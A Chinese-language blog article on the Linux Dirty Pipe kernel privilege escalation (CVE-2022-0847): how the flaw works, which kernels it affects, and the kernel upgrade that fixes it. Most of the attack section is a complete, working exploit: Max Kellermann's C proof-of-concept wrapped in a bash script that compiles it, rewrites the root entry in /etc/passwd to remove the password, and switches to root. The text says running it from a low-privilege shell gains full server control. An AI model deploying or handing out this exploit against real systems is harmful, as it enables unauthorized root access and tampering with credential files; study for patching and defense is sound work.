Linux 髒管道kernel提權漏洞復現及修復(CVE-2022-0847)
Linux 髒管道kernel提權漏洞復現及修復(CVE-2022-0847)
0x01漏洞簡述
2022年3月7日,安全研究員Max提出一個Linux核心提權漏洞CVE-2022-0847,利用該漏洞,攻擊者能夠實現低許可權使用者提升至root許可權,且完成主機任意可讀檔案的讀寫。該漏洞在原理上與先前出現的“DirtyCow”髒牛提權漏洞類似,且本質上是由於Kernel核心中編寫的匿名管道限制不嚴的問題,所以將其命名為“DirtyPipe”。
0x02漏洞影響範圍
該漏洞目前評級為高危,利用難度為簡易,具體影響版本為:5.8Linux kernel version5.16.11/5.15.25/5.10.102
0x03漏洞原理及復現利用
起初是由於一次簡單的伺服器日誌損壞解壓錯誤,頻繁會出現檔案末尾CRC校驗錯誤,Max構造了兩個模擬程式驗證了是linux核心覆蓋寫問題:
第一個程式模擬日誌寫入:
#include <unistd.h>
int main(int argc, char **argv) {
for (;;) write(1, "AAAAA", 5);
}
// ./writer >foo第二個程式模擬資料傳輸管道寫:
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char **argv) {
for (;;) {
splice(0, 0, 1, 0, 2, 0);
write(1, "BBBBB", 5);
}
}
// ./splicer <foo |cat >/dev/null實驗進行後正常的情況應該是:模擬日誌中應都是AAAAA欄位,而實驗結果是字串BBBBB,即出現了沒有寫入許可權的程式居然能夠向管道中覆蓋寫入資料。
分析其kernel程式碼可知道其原因:
if (pipe_buf_can_merge(buf) && offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
......
buf->flags = PIPE_BUF_FLAG_PACKET;
}這裡flag是管道初始化時的一個標誌位,控制寫入是否開闢新地址空間,可以看到我們這裡對於flag的控制僅僅是判斷了空間是否超過了上限卻沒有判斷空間是否為空,所以會導致一個嚴重問題:如果我們將一個管道空間排空,那麼對應的flag標誌位是不會被改變或者說重新初始化的,所以我們就能夠依舊在該管道進行“髒資料”寫入,因此在上述Max的實驗中進行管道資料讀入緩衝區的過程中出現一個寫程式即會導致我們能夠對該讀取檔案進行一個追寫。
因此,我們利用該漏洞能夠實現任意可讀檔案的無許可權寫入,進一步我們在linux提權過程中,由於/etc/passwd檔案可讀所以我們也可以進行root密碼的覆蓋寫,最終實現無密碼登入root。
主要思路:
1.建立一個管道
2.用任意資料填充管道(PIPE_BUF_FLAG_CAN_MERGE初始化為可在當前空間寫,無需建立新的緩衝空間)
3.排空管道(此時PIPE_BUF_FLAG_CAN_MERGE依舊保持2中狀態)
4.進行目標檔案拼接(資料從目標偏移之前的位置拼接到管道中)
5.任意資料寫入覆蓋
poc如下:
#/bin/bash
cat>exp.c<<EOF
/* SPDX-License-Identifier: GPL-2.0 */
/*
* Copyright 2022 CM4all GmbH / IONOS SE
*
* author: Max Kellermann <max.kellermann@ionos.com>
*
* Proof-of-concept exploit for the Dirty Pipe
* vulnerability (CVE-2022-0847) caused by an uninitialized
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any
* file contents in the page cache, even if the file is not permitted
* to be written, immutable or on a read-only mount.
*
* This exploit requires Linux 5.8 or later; the code path was made
* reachable by commit f6dd975583bd ("pipe: merge
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
* there before, it just provided an easy way to exploit it.
*
* There are two major limitations of this exploit: the offset cannot
* be on a page boundary (it needs to write one byte before the offset
* to add a reference to this page to the pipe), and the write cannot
* cross a page boundary.
*
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
*
* Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];
/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}
/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}
/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}
int main(int argc, char **argv)
{
if (argc != 4) {
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
return EXIT_FAILURE;
}
/* dumb command-line argument parser */
const char *const path = argv[1];
loff_t offset = strtoul(argv[2], NULL, 0);
const char *const data = argv[3];
const size_t data_size = strlen(data);
if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}
const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}
/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}
struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}
if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}
if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}
/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);
/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}
/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}
printf("It worked!\n");
return EXIT_SUCCESS;
}
EOF
gcc exp.c -o exp -std=c99
# 備份密碼檔案
rm -f /tmp/passwd
cp /etc/passwd /tmp/passwd
if [ -f "/tmp/passwd" ];then
echo "/etc/passwd已備份到/tmp/passwd"
passwd_tmp=$(cat /etc/passwd|head)
./exp /etc/passwd 1 "${passwd_tmp/root:x/oot:}"
echo -e "\n# 恢復原來的密碼\nrm -rf /etc/passwd\nmv /tmp/passwd /etc/passwd"
# 現在可以無需密碼切換到root賬號
su root
else
echo "/etc/passwd未備份到/tmp/passwd"
exit 1
fi
如上圖所示為普通使用者直接提升至root,一般利用方法即在低許可權shell下執行該指令碼即可獲得伺服器最高許可權
0x04漏洞修復
儘快升級linux核心至如下版本:Linux 5.16.11、5.15.25 和 5.10.102
0x05引用
1.Max Kellermann部落格地址:https://dirtypipe.cm4all.com/
2.poc地址:https://github.com/imfiver/CVE-2022-0847/blob/main/Dirty-Pipe.sh
相關文章
- Linux 核心最新高危提權漏洞:髒管道 (Dirty Pipe)Linux
- CVE-2022-0847 Linux DirtyPipe核心提權漏洞Linux
- phpStudy poc漏洞復現以及漏洞修復辦法PHP
- 微軟修復 Cortana 智慧助手提權漏洞微軟
- PrestaShop網站漏洞修復如何修復REST網站
- Linux常見漏洞修復教程!Linux
- Redis未授權漏洞復現Redis
- TomcatAJP檔案包含漏洞及線上修復漏洞Tomcat
- 網站漏洞修復對phpmyadmin防止被入侵提權的解決辦法網站PHP
- 修復網站漏洞對phpmyadmin防止被入侵提權的解決辦法網站PHP
- 【漏洞復現】Redis未授權訪問漏洞Redis
- WordPress網站漏洞利用及漏洞修復解決方案網站
- 怎麼修復網站漏洞騎士cms的漏洞修復方案網站
- 網站漏洞修復服務商關於越權漏洞分析網站
- 【阿菜漏洞復現】DeFi 平臺 MonoX Finance 漏洞分析及復現MonoNaN
- Linux glibc 幽靈漏洞修復方案Linux
- 詳解ShellShock 漏洞復現原理,內附ShellShock的修復方法
- 網站漏洞修復 上傳webshell漏洞修補網站Webshell
- Windows域提權漏洞CVE-2022-26923分析與復現Windows
- Canonical 修復 Ubuntu 13.04 中 Linux 核心漏洞UbuntuLinux
- Linux核心發現兩個沒有被修復的DoS漏洞Linux
- struts2架構網站漏洞修復詳情與利用漏洞修復方案架構網站
- DVWA中學習PHP常見漏洞及修復方法PHP
- 專家建議網站漏洞要及時修復網站
- 如何修復AppScan漏洞APP
- Apache漏洞復現Apache
- VMware Tools本地提權漏洞CVE-2022-31676分析與復現(1)
- weblogic T3 漏洞修復Web
- thinkcmf 網站最新漏洞修復方法網站
- WordPress 5.1.1 釋出 修復 CSRF 漏洞
- 雲伺服器修復apache漏洞伺服器Apache
- 微信小程式漏洞怎麼修復微信小程式
- 程式碼注入漏洞以及修復方法
- 任意檔案上傳漏洞修復
- CSRF漏洞復現及測試工具講解
- weblogic 漏洞復現Web
- 笑臉漏洞復現
- 關於 Linux Polkit 許可權提升漏洞(CVE-2021-4034)的修復方法Linux